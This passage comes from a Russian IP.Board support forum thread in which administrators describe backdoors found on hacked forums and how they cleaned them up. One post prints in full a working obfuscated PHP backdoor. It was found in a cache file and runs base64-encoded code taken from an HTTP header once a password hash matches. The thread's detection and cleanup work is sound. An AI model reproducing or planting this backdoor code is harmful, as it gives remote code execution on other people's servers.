Не хочу показаться невнимательным, но я не нашел
Security update
#183
blane ответил: 
- Advanced
-
- Группа: IPB Specialist
- Сообщений: 346
- Регистрация: 19-Июнь 11
- Репутация: 50
- IPB version:I have no IPB
Отправлено 04 Апрель 2013 - 22:00
заметил на днях:
в /uploads/monthly 03_2013 (могут оказаться и другие директории)
файлы с точно такими же именами как и jpg, но имебщие расширение .ipb
внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)
лечение - удалить
в /uploads/monthly 03_2013 (могут оказаться и другие директории)
файлы с точно такими же именами как и jpg, но имебщие расширение .ipb
внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)
лечение - удалить
#184
Dmitriy427 ответил:
- Advanced
-
- Группа: IPB Specialist
- Сообщений: 620
- Регистрация: 15-Октябрь 11
- Репутация: 181
- Откуда:Россия, Тула
- IPB version:3.3.x
Отправлено 08 Апрель 2013 - 09:11
Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.
#185
Minnow ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 53
- Регистрация: 21-Июль 10
- Репутация: 0
- IPB version:3.1.x
Отправлено 12 Май 2013 - 18:52
Здравствуйте.
Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..
Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием
, удалил.
Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?
Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..
Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием
<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?
#187
Атаман ответил:
- Advanced
-
- Группа: IPB Skins.ru Team
- Сообщений: 2 298
- Регистрация: 13-Апрель 12
- Репутация: 360
- Откуда:no
- IPB version:1.x
Отправлено 13 Май 2013 - 11:07
Прочтите тему эту от А до Я.
Ваше решение.
Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile
и пробежитесь по аватарам.
Ваше решение.
Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile
и пробежитесь по аватарам.
#188
Minnow ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 53
- Регистрация: 21-Июль 10
- Репутация: 0
- IPB version:3.1.x
Отправлено 14 Май 2013 - 00:41
Спасибо.
В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php
с содержанием -
Это тоже оно? Вроде бы раньше не было ..
В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php
с содержанием -
<?php
class alpha
{
public function getOutput()
{
$template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();
$js = <<<JS
<script type='text/javascript'>
$('alpha_switch').observe('click', function(){
if( $('member_alpha_ru') )
{
$('member_alpha').toggle();
$('member_alpha_ru').toggle();
}
} );
$('alpha_switch_en').observe('click', function(){
if( $('member_alpha') )
{
$('member_alpha').toggle();
$('member_alpha_ru').toggle();
}
} );
JS;
if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
{
$js .= <<<JS
$('member_alpha').toggle();
JS;
}
else
{
$js .= <<<JS
$('member_alpha_ru').toggle();
JS;
}
$js .= <<<JS
</script>
JS;
return $template . $js;
}
}Это тоже оно? Вроде бы раньше не было ..
#189
Minnow ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 53
- Регистрация: 21-Июль 10
- Репутация: 0
- IPB version:3.1.x
Отправлено 14 Май 2013 - 01:48
Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -
photo-128.jpg и tmpgw4ia4
почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.
Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.
photo-128.jpg и tmpgw4ia4
почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.
Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.
#191
newbie ответил:
- Advanced
-
- Группа: IPB Skins.ru Team
- Сообщений: 2 384
- Регистрация: 26-Октябрь 11
- Репутация: 954
- IPB version:I have no IPB
Отправлено 14 Май 2013 - 11:25
Minnow сказал(а):
Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.
Это файл ибровского хука "Русские буквы в списке юзеров"
#195
Minnow ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 53
- Регистрация: 21-Июль 10
- Репутация: 0
- IPB version:3.1.x
Отправлено 23 Май 2013 - 16:17
Атаман 23 Май 2013 - 05:23 сказал(а):
Поменяйте путь в АЦ
Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.
Сообщение изменено: Minnow (23 Май 2013 - 16:19)
- ← Покупка лицензии IPB 3.4
- Дискуссионный клуб. Споры на тему IPB
- Апгрейд лицензии и смена домена (IPB 3.4.6) →